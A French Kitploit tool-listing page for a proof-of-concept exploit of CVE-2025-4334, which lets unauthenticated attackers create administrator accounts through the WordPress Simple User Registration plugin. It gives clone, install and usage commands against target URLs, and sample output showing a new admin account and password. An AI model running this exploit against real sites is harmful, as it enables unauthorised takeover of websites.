Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4334 — Exploit de preuve de concept pour CVE-2025-4334, une vulnérabilité d'élévation de privilèges dans le plugin WordPress Simple User Registration (<= 6.3), permettant à des attaquants non authentifiés de créer des comptes administrateur. | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Escalade de PrivilègesAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

Exploit de preuve de concept pour CVE-2025-4334, une vulnérabilité d'élévation de privilèges dans le plugin WordPress Simple User Registration (<= 6.3), permettant à des attaquants non authentifiés de créer des comptes administrateur.

Voir le dépôt
417il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Logo WordPress

CVE-2025-4334 - Simple User Registration <= 6.3 Escalade de privilèges non authentifiée

Titre de l'exploit : Simple User Registration <= 6.3 – Escalade de privilèges non authentifiée Auteur : Gaurav Bhattacharjee (0xgh057r3c0n) ID CVE : CVE-2025-4334

Cet exploit cible une vulnérabilité dans le plugin Simple User Registration pour WordPress (<= v6.3), permettant à des attaquants non authentifiés d'élever leurs privilèges et de créer un nouveau compte administrateur.


⚙️ Installation

Clonez le dépôt et installez les dépendances Python requises :

git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

Dépendances :

  • requests
  • colorama

🚀 Utilisation

python3 CVE-2025-4334.py -u <base_url> --form <form_url>

Arguments :

  • -u / --url → URL de base de WordPress (ex. https://target.com/wordpress/)
  • --form → URL complète du formulaire d'inscription (ex. https://target.com/wpr/default-registration/)

Exemple :

python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 Exemple de sortie

[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ Avertissement

Cet outil est fourni à des fins éducatives et de recherche uniquement. Toute utilisation non autorisée contre des systèmes sans permission est illégale. L'auteur décline toute responsabilité en cas d'utilisation abusive.


📄 Licence

Ce projet est sous licence MIT License.

Télécharger l’outil